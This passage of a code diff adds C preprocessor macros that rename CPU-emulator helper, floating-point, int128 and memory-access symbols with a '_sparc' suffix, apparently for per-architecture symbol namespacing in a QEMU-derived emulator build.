+#define helper_iwmmxt_rorl helper_iwmmxt_rorl_sparc +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_sparc +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_sparc +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_sparc +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_sparc +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_sparc +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_sparc +#define helper_iwmmxt_slll helper_iwmmxt_slll_sparc +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_sparc +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_sparc +#define helper_iwmmxt_sral helper_iwmmxt_sral_sparc +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_sparc +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_sparc +#define helper_iwmmxt_srll helper_iwmmxt_srll_sparc +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_sparc +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_sparc +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_sparc +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_sparc +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_sparc +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_sparc +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_sparc +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_sparc +#define helper_iwmmxt_subub helper_iwmmxt_subub_sparc +#define helper_iwmmxt_subul helper_iwmmxt_subul_sparc +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_sparc +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_sparc +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_sparc +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_sparc +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_sparc +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_sparc +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_sparc +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_sparc +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_sparc +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_sparc +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_sparc +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_sparc +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_sparc +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_sparc +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_sparc +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_sparc +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_sparc +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_sparc +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_sparc +#define helper_ldb_cmmu helper_ldb_cmmu_sparc +#define helper_ldb_mmu helper_ldb_mmu_sparc +#define helper_ldl_cmmu helper_ldl_cmmu_sparc +#define helper_ldl_mmu helper_ldl_mmu_sparc +#define helper_ldq_cmmu helper_ldq_cmmu_sparc +#define helper_ldq_mmu helper_ldq_mmu_sparc +#define helper_ldw_cmmu helper_ldw_cmmu_sparc +#define helper_ldw_mmu helper_ldw_mmu_sparc +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_sparc +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_sparc +#define helper_le_ldq_mmu helper_le_ldq_mmu_sparc +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc +#define helper_le_ldul_mmu helper_le_ldul_mmu_sparc +#define helper_le_lduw_mmu helper_le_lduw_mmu_sparc +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_sparc +#define helper_le_stl_mmu helper_le_stl_mmu_sparc +#define helper_le_stq_mmu helper_le_stq_mmu_sparc +#define helper_le_stw_mmu helper_le_stw_mmu_sparc +#define helper_msr_i_pstate helper_msr_i_pstate_sparc +#define helper_neon_abd_f32 helper_neon_abd_f32_sparc +#define helper_neon_abdl_s16 helper_neon_abdl_s16_sparc +#define helper_neon_abdl_s32 helper_neon_abdl_s32_sparc +#define helper_neon_abdl_s64 helper_neon_abdl_s64_sparc +#define helper_neon_abdl_u16 helper_neon_abdl_u16_sparc +#define helper_neon_abdl_u32 helper_neon_abdl_u32_sparc +#define helper_neon_abdl_u64 helper_neon_abdl_u64_sparc +#define helper_neon_abd_s16 helper_neon_abd_s16_sparc +#define helper_neon_abd_s32 helper_neon_abd_s32_sparc +#define helper_neon_abd_s8 helper_neon_abd_s8_sparc +#define helper_neon_abd_u16 helper_neon_abd_u16_sparc +#define helper_neon_abd_u32 helper_neon_abd_u32_sparc +#define helper_neon_abd_u8 helper_neon_abd_u8_sparc +#define helper_neon_abs_s16 helper_neon_abs_s16_sparc +#define helper_neon_abs_s8 helper_neon_abs_s8_sparc +#define helper_neon_acge_f32 helper_neon_acge_f32_sparc +#define helper_neon_acge_f64 helper_neon_acge_f64_sparc +#define helper_neon_acgt_f32 helper_neon_acgt_f32_sparc +#define helper_neon_acgt_f64 helper_neon_acgt_f64_sparc +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_sparc +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_sparc +#define helper_neon_addl_u16 helper_neon_addl_u16_sparc +#define helper_neon_addl_u32 helper_neon_addl_u32_sparc +#define helper_neon_add_u16 helper_neon_add_u16_sparc +#define helper_neon_add_u8 helper_neon_add_u8_sparc +#define helper_neon_ceq_f32 helper_neon_ceq_f32_sparc +#define helper_neon_ceq_u16 helper_neon_ceq_u16_sparc +#define helper_neon_ceq_u32 helper_neon_ceq_u32_sparc +#define helper_neon_ceq_u8 helper_neon_ceq_u8_sparc +#define helper_neon_cge_f32 helper_neon_cge_f32_sparc +#define helper_neon_cge_s16 helper_neon_cge_s16_sparc +#define helper_neon_cge_s32 helper_neon_cge_s32_sparc +#define helper_neon_cge_s8 helper_neon_cge_s8_sparc +#define helper_neon_cge_u16 helper_neon_cge_u16_sparc +#define helper_neon_cge_u32 helper_neon_cge_u32_sparc +#define helper_neon_cge_u8 helper_neon_cge_u8_sparc +#define helper_neon_cgt_f32 helper_neon_cgt_f32_sparc +#define helper_neon_cgt_s16 helper_neon_cgt_s16_sparc +#define helper_neon_cgt_s32 helper_neon_cgt_s32_sparc +#define helper_neon_cgt_s8 helper_neon_cgt_s8_sparc +#define helper_neon_cgt_u16 helper_neon_cgt_u16_sparc +#define helper_neon_cgt_u32 helper_neon_cgt_u32_sparc +#define helper_neon_cgt_u8 helper_neon_cgt_u8_sparc +#define helper_neon_cls_s16 helper_neon_cls_s16_sparc +#define helper_neon_cls_s32 helper_neon_cls_s32_sparc +#define helper_neon_cls_s8 helper_neon_cls_s8_sparc +#define helper_neon_clz_u16 helper_neon_clz_u16_sparc +#define helper_neon_clz_u8 helper_neon_clz_u8_sparc +#define helper_neon_cnt_u8 helper_neon_cnt_u8_sparc +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_sparc +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_sparc +#define helper_neon_hadd_s16 helper_neon_hadd_s16_sparc +#define helper_neon_hadd_s32 helper_neon_hadd_s32_sparc +#define helper_neon_hadd_s8 helper_neon_hadd_s8_sparc +#define helper_neon_hadd_u16 helper_neon_hadd_u16_sparc +#define helper_neon_hadd_u32 helper_neon_hadd_u32_sparc +#define helper_neon_hadd_u8 helper_neon_hadd_u8_sparc +#define helper_neon_hsub_s16 helper_neon_hsub_s16_sparc +#define helper_neon_hsub_s32 helper_neon_hsub_s32_sparc +#define helper_neon_hsub_s8 helper_neon_hsub_s8_sparc +#define helper_neon_hsub_u16 helper_neon_hsub_u16_sparc +#define helper_neon_hsub_u32 helper_neon_hsub_u32_sparc +#define helper_neon_hsub_u8 helper_neon_hsub_u8_sparc +#define helper_neon_max_s16 helper_neon_max_s16_sparc +#define helper_neon_max_s32 helper_neon_max_s32_sparc +#define helper_neon_max_s8 helper_neon_max_s8_sparc +#define helper_neon_max_u16 helper_neon_max_u16_sparc +#define helper_neon_max_u32 helper_neon_max_u32_sparc +#define helper_neon_max_u8 helper_neon_max_u8_sparc +#define helper_neon_min_s16 helper_neon_min_s16_sparc +#define helper_neon_min_s32 helper_neon_min_s32_sparc +#define helper_neon_min_s8 helper_neon_min_s8_sparc +#define helper_neon_min_u16 helper_neon_min_u16_sparc +#define helper_neon_min_u32 helper_neon_min_u32_sparc +#define helper_neon_min_u8 helper_neon_min_u8_sparc +#define helper_neon_mull_p8 helper_neon_mull_p8_sparc +#define helper_neon_mull_s16 helper_neon_mull_s16_sparc +#define helper_neon_mull_s8 helper_neon_mull_s8_sparc +#define helper_neon_mull_u16 helper_neon_mull_u16_sparc +#define helper_neon_mull_u8 helper_neon_mull_u8_sparc +#define helper_neon_mul_p8 helper_neon_mul_p8_sparc +#define helper_neon_mul_u16 helper_neon_mul_u16_sparc +#define helper_neon_mul_u8 helper_neon_mul_u8_sparc +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_sparc +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_sparc +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_sparc +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_sparc +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_sparc +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_sparc +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_sparc +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_sparc +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_sparc +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_sparc +#define helper_neon_narrow_u16 helper_neon_narrow_u16_sparc +#define helper_neon_narrow_u8 helper_neon_narrow_u8_sparc +#define helper_neon_negl_u16 helper_neon_negl_u16_sparc +#define helper_neon_negl_u32 helper_neon_negl_u32_sparc +#define helper_neon_paddl_u16 helper_neon_paddl_u16_sparc +#define helper_neon_paddl_u32 helper_neon_paddl_u32_sparc +#define helper_neon_padd_u16 helper_neon_padd_u16_sparc +#define helper_neon_padd_u8 helper_neon_padd_u8_sparc +#define helper_neon_pmax_s16 helper_neon_pmax_s16_sparc +#define helper_neon_pmax_s8 helper_neon_pmax_s8_sparc +#define helper_neon_pmax_u16 helper_neon_pmax_u16_sparc +#define helper_neon_pmax_u8 helper_neon_pmax_u8_sparc +#define helper_neon_pmin_s16 helper_neon_pmin_s16_sparc +#define helper_neon_pmin_s8 helper_neon_pmin_s8_sparc +#define helper_neon_pmin_u16 helper_neon_pmin_u16_sparc +#define helper_neon_pmin_u8 helper_neon_pmin_u8_sparc +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_sparc +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_sparc +#define helper_neon_qabs_s16 helper_neon_qabs_s16_sparc +#define helper_neon_qabs_s32 helper_neon_qabs_s32_sparc +#define helper_neon_qabs_s64 helper_neon_qabs_s64_sparc +#define helper_neon_qabs_s8 helper_neon_qabs_s8_sparc +#define helper_neon_qadd_s16 helper_neon_qadd_s16_sparc +#define helper_neon_qadd_s32 helper_neon_qadd_s32_sparc +#define helper_neon_qadd_s64 helper_neon_qadd_s64_sparc +#define helper_neon_qadd_s8 helper_neon_qadd_s8_sparc +#define helper_neon_qadd_u16 helper_neon_qadd_u16_sparc +#define helper_neon_qadd_u32 helper_neon_qadd_u32_sparc +#define helper_neon_qadd_u64 helper_neon_qadd_u64_sparc +#define helper_neon_qadd_u8 helper_neon_qadd_u8_sparc +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_sparc +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_sparc +#define helper_neon_qneg_s16 helper_neon_qneg_s16_sparc +#define helper_neon_qneg_s32 helper_neon_qneg_s32_sparc +#define helper_neon_qneg_s64 helper_neon_qneg_s64_sparc +#define helper_neon_qneg_s8 helper_neon_qneg_s8_sparc +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_sparc +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_sparc +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_sparc +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_sparc +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_sparc +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_sparc +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_sparc +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_sparc +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_sparc +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_sparc +#define helper_neon_qshl_s16 helper_neon_qshl_s16_sparc +#define helper_neon_qshl_s32 helper_neon_qshl_s32_sparc +#define helper_neon_qshl_s64 helper_neon_qshl_s64_sparc +#define helper_neon_qshl_s8 helper_neon_qshl_s8_sparc +#define helper_neon_qshl_u16 helper_neon_qshl_u16_sparc +#define helper_neon_qshl_u32 helper_neon_qshl_u32_sparc +#define helper_neon_qshl_u64 helper_neon_qshl_u64_sparc +#define helper_neon_qshl_u8 helper_neon_qshl_u8_sparc +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_sparc +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_sparc +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_sparc +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_sparc +#define helper_neon_qsub_s16 helper_neon_qsub_s16_sparc +#define helper_neon_qsub_s32 helper_neon_qsub_s32_sparc +#define helper_neon_qsub_s64 helper_neon_qsub_s64_sparc +#define helper_neon_qsub_s8 helper_neon_qsub_s8_sparc +#define helper_neon_qsub_u16 helper_neon_qsub_u16_sparc +#define helper_neon_qsub_u32 helper_neon_qsub_u32_sparc +#define helper_neon_qsub_u64 helper_neon_qsub_u64_sparc +#define helper_neon_qsub_u8 helper_neon_qsub_u8_sparc +#define helper_neon_qunzip16 helper_neon_qunzip16_sparc +#define helper_neon_qunzip32 helper_neon_qunzip32_sparc +#define helper_neon_qunzip8 helper_neon_qunzip8_sparc +#define helper_neon_qzip16 helper_neon_qzip16_sparc +#define helper_neon_qzip32 helper_neon_qzip32_sparc +#define helper_neon_qzip8 helper_neon_qzip8_sparc +#define helper_neon_rbit_u8 helper_neon_rbit_u8_sparc +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_sparc +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_sparc +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_sparc +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_sparc +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_sparc +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_sparc +#define helper_neon_rshl_s16 helper_neon_rshl_s16_sparc +#define helper_neon_rshl_s32 helper_neon_rshl_s32_sparc +#define helper_neon_rshl_s64 helper_neon_rshl_s64_sparc +#define helper_neon_rshl_s8 helper_neon_rshl_s8_sparc +#define helper_neon_rshl_u16 helper_neon_rshl_u16_sparc +#define helper_neon_rshl_u32 helper_neon_rshl_u32_sparc +#define helper_neon_rshl_u64 helper_neon_rshl_u64_sparc +#define helper_neon_rshl_u8 helper_neon_rshl_u8_sparc +#define helper_neon_shl_s16 helper_neon_shl_s16_sparc +#define helper_neon_shl_s32 helper_neon_shl_s32_sparc +#define helper_neon_shl_s64 helper_neon_shl_s64_sparc +#define helper_neon_shl_s8 helper_neon_shl_s8_sparc +#define helper_neon_shl_u16 helper_neon_shl_u16_sparc +#define helper_neon_shl_u32 helper_neon_shl_u32_sparc +#define helper_neon_shl_u64 helper_neon_shl_u64_sparc +#define helper_neon_shl_u8 helper_neon_shl_u8_sparc +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_sparc +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_sparc +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_sparc +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_sparc +#define helper_neon_subl_u16 helper_neon_subl_u16_sparc +#define helper_neon_subl_u32 helper_neon_subl_u32_sparc +#define helper_neon_sub_u16 helper_neon_sub_u16_sparc +#define helper_neon_sub_u8 helper_neon_sub_u8_sparc +#define helper_neon_tbl helper_neon_tbl_sparc +#define helper_neon_tst_u16 helper_neon_tst_u16_sparc +#define helper_neon_tst_u32 helper_neon_tst_u32_sparc +#define helper_neon_tst_u8 helper_neon_tst_u8_sparc +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_sparc +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_sparc +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_sparc +#define helper_neon_unzip16 helper_neon_unzip16_sparc +#define helper_neon_unzip8 helper_neon_unzip8_sparc +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_sparc +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_sparc +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_sparc +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_sparc +#define helper_neon_widen_s16 helper_neon_widen_s16_sparc +#define helper_neon_widen_s8 helper_neon_widen_s8_sparc +#define helper_neon_widen_u16 helper_neon_widen_u16_sparc +#define helper_neon_widen_u8 helper_neon_widen_u8_sparc +#define helper_neon_zip16 helper_neon_zip16_sparc +#define helper_neon_zip8 helper_neon_zip8_sparc +#define helper_pre_hvc helper_pre_hvc_sparc +#define helper_pre_smc helper_pre_smc_sparc +#define helper_qadd16 helper_qadd16_sparc +#define helper_qadd8 helper_qadd8_sparc +#define helper_qaddsubx helper_qaddsubx_sparc +#define helper_qsub16 helper_qsub16_sparc +#define helper_qsub8 helper_qsub8_sparc +#define helper_qsubaddx helper_qsubaddx_sparc +#define helper_rbit helper_rbit_sparc +#define helper_recpe_f32 helper_recpe_f32_sparc +#define helper_recpe_f64 helper_recpe_f64_sparc +#define helper_recpe_u32 helper_recpe_u32_sparc +#define helper_recps_f32 helper_recps_f32_sparc +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_sparc +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc +#define helper_ret_stb_mmu helper_ret_stb_mmu_sparc +#define helper_rintd helper_rintd_sparc +#define helper_rintd_exact helper_rintd_exact_sparc +#define helper_rints helper_rints_sparc +#define helper_rints_exact helper_rints_exact_sparc +#define helper_ror_cc helper_ror_cc_sparc +#define helper_rsqrte_f32 helper_rsqrte_f32_sparc +#define helper_rsqrte_f64 helper_rsqrte_f64_sparc +#define helper_rsqrte_u32 helper_rsqrte_u32_sparc +#define helper_rsqrts_f32 helper_rsqrts_f32_sparc +#define helper_sadd16 helper_sadd16_sparc +#define helper_sadd8 helper_sadd8_sparc +#define helper_saddsubx helper_saddsubx_sparc +#define helper_sar_cc helper_sar_cc_sparc +#define helper_sdiv helper_sdiv_sparc +#define helper_sel_flags helper_sel_flags_sparc +#define helper_set_cp_reg helper_set_cp_reg_sparc +#define helper_set_cp_reg64 helper_set_cp_reg64_sparc +#define helper_set_neon_rmode helper_set_neon_rmode_sparc +#define helper_set_r13_banked helper_set_r13_banked_sparc +#define helper_set_rmode helper_set_rmode_sparc +#define helper_set_user_reg helper_set_user_reg_sparc +#define helper_shadd16 helper_shadd16_sparc +#define helper_shadd8 helper_shadd8_sparc +#define helper_shaddsubx helper_shaddsubx_sparc +#define helper_shl_cc helper_shl_cc_sparc +#define helper_shr_cc helper_shr_cc_sparc +#define helper_shsub16 helper_shsub16_sparc +#define helper_shsub8 helper_shsub8_sparc +#define helper_shsubaddx helper_shsubaddx_sparc +#define helper_ssat helper_ssat_sparc +#define helper_ssat16 helper_ssat16_sparc +#define helper_ssub16 helper_ssub16_sparc +#define helper_ssub8 helper_ssub8_sparc +#define helper_ssubaddx helper_ssubaddx_sparc +#define helper_stb_mmu helper_stb_mmu_sparc +#define helper_stl_mmu helper_stl_mmu_sparc +#define helper_stq_mmu helper_stq_mmu_sparc +#define helper_stw_mmu helper_stw_mmu_sparc +#define helper_sub_saturate helper_sub_saturate_sparc +#define helper_sub_usaturate helper_sub_usaturate_sparc +#define helper_sxtb16 helper_sxtb16_sparc +#define helper_uadd16 helper_uadd16_sparc +#define helper_uadd8 helper_uadd8_sparc +#define helper_uaddsubx helper_uaddsubx_sparc +#define helper_udiv helper_udiv_sparc +#define helper_uhadd16 helper_uhadd16_sparc +#define helper_uhadd8 helper_uhadd8_sparc +#define helper_uhaddsubx helper_uhaddsubx_sparc +#define helper_uhsub16 helper_uhsub16_sparc +#define helper_uhsub8 helper_uhsub8_sparc +#define helper_uhsubaddx helper_uhsubaddx_sparc +#define helper_uqadd16 helper_uqadd16_sparc +#define helper_uqadd8 helper_uqadd8_sparc +#define helper_uqaddsubx helper_uqaddsubx_sparc +#define helper_uqsub16 helper_uqsub16_sparc +#define helper_uqsub8 helper_uqsub8_sparc +#define helper_uqsubaddx helper_uqsubaddx_sparc +#define helper_usad8 helper_usad8_sparc +#define helper_usat helper_usat_sparc +#define helper_usat16 helper_usat16_sparc +#define helper_usub16 helper_usub16_sparc +#define helper_usub8 helper_usub8_sparc +#define helper_usubaddx helper_usubaddx_sparc +#define helper_uxtb16 helper_uxtb16_sparc +#define helper_v7m_mrs helper_v7m_mrs_sparc +#define helper_v7m_msr helper_v7m_msr_sparc +#define helper_vfp_absd helper_vfp_absd_sparc +#define helper_vfp_abss helper_vfp_abss_sparc +#define helper_vfp_addd helper_vfp_addd_sparc +#define helper_vfp_adds helper_vfp_adds_sparc +#define helper_vfp_cmpd helper_vfp_cmpd_sparc +#define helper_vfp_cmped helper_vfp_cmped_sparc +#define helper_vfp_cmpes helper_vfp_cmpes_sparc +#define helper_vfp_cmps helper_vfp_cmps_sparc +#define helper_vfp_divd helper_vfp_divd_sparc +#define helper_vfp_divs helper_vfp_divs_sparc +#define helper_vfp_fcvtds helper_vfp_fcvtds_sparc +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_sparc +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_sparc +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_sparc +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_sparc +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_sparc +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_sparc +#define helper_vfp_maxd helper_vfp_maxd_sparc +#define helper_vfp_maxnumd helper_vfp_maxnumd_sparc +#define helper_vfp_maxnums helper_vfp_maxnums_sparc +#define helper_vfp_maxs helper_vfp_maxs_sparc +#define helper_vfp_mind helper_vfp_mind_sparc +#define helper_vfp_minnumd helper_vfp_minnumd_sparc +#define helper_vfp_minnums helper_vfp_minnums_sparc +#define helper_vfp_mins helper_vfp_mins_sparc +#define helper_vfp_muladdd helper_vfp_muladdd_sparc +#define helper_vfp_muladds helper_vfp_muladds_sparc +#define helper_vfp_muld helper_vfp_muld_sparc +#define helper_vfp_muls helper_vfp_muls_sparc +#define helper_vfp_negd helper_vfp_negd_sparc +#define helper_vfp_negs helper_vfp_negs_sparc +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_sparc +#define helper_vfp_shtod helper_vfp_shtod_sparc +#define helper_vfp_shtos helper_vfp_shtos_sparc +#define helper_vfp_sitod helper_vfp_sitod_sparc +#define helper_vfp_sitos helper_vfp_sitos_sparc +#define helper_vfp_sltod helper_vfp_sltod_sparc +#define helper_vfp_sltos helper_vfp_sltos_sparc +#define helper_vfp_sqrtd helper_vfp_sqrtd_sparc +#define helper_vfp_sqrts helper_vfp_sqrts_sparc +#define helper_vfp_sqtod helper_vfp_sqtod_sparc +#define helper_vfp_sqtos helper_vfp_sqtos_sparc +#define helper_vfp_subd helper_vfp_subd_sparc +#define helper_vfp_subs helper_vfp_subs_sparc +#define helper_vfp_toshd helper_vfp_toshd_sparc +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_sparc +#define helper_vfp_toshs helper_vfp_toshs_sparc +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_sparc +#define helper_vfp_tosid helper_vfp_tosid_sparc +#define helper_vfp_tosis helper_vfp_tosis_sparc +#define helper_vfp_tosizd helper_vfp_tosizd_sparc +#define helper_vfp_tosizs helper_vfp_tosizs_sparc +#define helper_vfp_tosld helper_vfp_tosld_sparc +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_sparc +#define helper_vfp_tosls helper_vfp_tosls_sparc +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_sparc +#define helper_vfp_tosqd helper_vfp_tosqd_sparc +#define helper_vfp_tosqs helper_vfp_tosqs_sparc +#define helper_vfp_touhd helper_vfp_touhd_sparc +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_sparc +#define helper_vfp_touhs helper_vfp_touhs_sparc +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_sparc +#define helper_vfp_touid helper_vfp_touid_sparc +#define helper_vfp_touis helper_vfp_touis_sparc +#define helper_vfp_touizd helper_vfp_touizd_sparc +#define helper_vfp_touizs helper_vfp_touizs_sparc +#define helper_vfp_tould helper_vfp_tould_sparc +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_sparc +#define helper_vfp_touls helper_vfp_touls_sparc +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_sparc +#define helper_vfp_touqd helper_vfp_touqd_sparc +#define helper_vfp_touqs helper_vfp_touqs_sparc +#define helper_vfp_uhtod helper_vfp_uhtod_sparc +#define helper_vfp_uhtos helper_vfp_uhtos_sparc +#define helper_vfp_uitod helper_vfp_uitod_sparc +#define helper_vfp_uitos helper_vfp_uitos_sparc +#define helper_vfp_ultod helper_vfp_ultod_sparc +#define helper_vfp_ultos helper_vfp_ultos_sparc +#define helper_vfp_uqtod helper_vfp_uqtod_sparc +#define helper_vfp_uqtos helper_vfp_uqtos_sparc +#define helper_wfe helper_wfe_sparc +#define helper_wfi helper_wfi_sparc +#define hex2decimal hex2decimal_sparc +#define hw_breakpoint_update hw_breakpoint_update_sparc +#define hw_breakpoint_update_all hw_breakpoint_update_all_sparc +#define hw_watchpoint_update hw_watchpoint_update_sparc +#define hw_watchpoint_update_all hw_watchpoint_update_all_sparc +#define _init _init_sparc +#define init_cpreg_list init_cpreg_list_sparc +#define init_lists init_lists_sparc +#define input_type_enum input_type_enum_sparc +#define int128_2_64 int128_2_64_sparc +#define int128_add int128_add_sparc +#define int128_addto int128_addto_sparc +#define int128_and int128_and_sparc +#define int128_eq int128_eq_sparc +#define int128_ge int128_ge_sparc +#define int128_get64 int128_get64_sparc +#define int128_gt int128_gt_sparc +#define int128_le int128_le_sparc +#define int128_lt int128_lt_sparc +#define int128_make64 int128_make64_sparc +#define int128_max int128_max_sparc +#define int128_min int128_min_sparc +#define int128_ne int128_ne_sparc +#define int128_neg int128_neg_sparc +#define int128_nz int128_nz_sparc +#define int128_rshift int128_rshift_sparc +#define int128_sub int128_sub_sparc +#define int128_subfrom int128_subfrom_sparc +#define int128_zero int128_zero_sparc +#define int16_to_float32 int16_to_float32_sparc +#define int16_to_float64 int16_to_float64_sparc +#define int32_to_float128 int32_to_float128_sparc +#define int32_to_float32 int32_to_float32_sparc +#define int32_to_float64 int32_to_float64_sparc +#define int32_to_floatx80 int32_to_floatx80_sparc +#define int64_to_float128 int64_to_float128_sparc +#define int64_to_float32 int64_to_float32_sparc +#define int64_to_float64 int64_to_float64_sparc +#define int64_to_floatx80 int64_to_floatx80_sparc +#define invalidate_and_set_dirty invalidate_and_set_dirty_sparc +#define invalidate_page_bitmap invalidate_page_bitmap_sparc +#define io_mem_read io_mem_read_sparc +#define io_mem_write io_mem_write_sparc +#define io_readb io_readb_sparc +#define io_readl io_readl_sparc +#define io_readq io_readq_sparc +#define io_readw io_readw_sparc +#define iotlb_to_region iotlb_to_region_sparc +#define io_writeb io_writeb_sparc +#define io_writel io_writel_sparc +#define io_writeq io_writeq_sparc +#define io_writew io_writew_sparc +#define is_a64 is_a64_sparc +#define is_help_option is_help_option_sparc +#define isr_read isr_read_sparc +#define is_valid_option_list is_valid_option_list_sparc +#define iwmmxt_load_creg iwmmxt_load_creg_sparc +#define iwmmxt_load_reg iwmmxt_load_reg_sparc +#define iwmmxt_store_creg iwmmxt_store_creg_sparc +#define iwmmxt_store_reg iwmmxt_store_reg_sparc +#define __jit_debug_descriptor __jit_debug_descriptor_sparc +#define __jit_debug_register_code __jit_debug_register_code_sparc +#define kvm_to_cpreg_id kvm_to_cpreg_id_sparc +#define last_ram_offset last_ram_offset_sparc +#define ldl_be_p ldl_be_p_sparc +#define ldl_be_phys ldl_be_phys_sparc +#define ldl_he_p ldl_he_p_sparc +#define ldl_le_p ldl_le_p_sparc +#define ldl_le_phys ldl_le_phys_sparc +#define ldl_phys ldl_phys_sparc +#define ldl_phys_internal ldl_phys_internal_sparc +#define ldq_be_p ldq_be_p_sparc +#define ldq_be_phys ldq_be_phys_sparc +#define ldq_he_p ldq_he_p_sparc +#define ldq_le_p ldq_le_p_sparc +#define ldq_le_phys ldq_le_phys_sparc +#define ldq_phys ldq_phys_sparc +#define ldq_phys_internal ldq_phys_internal_sparc +#define 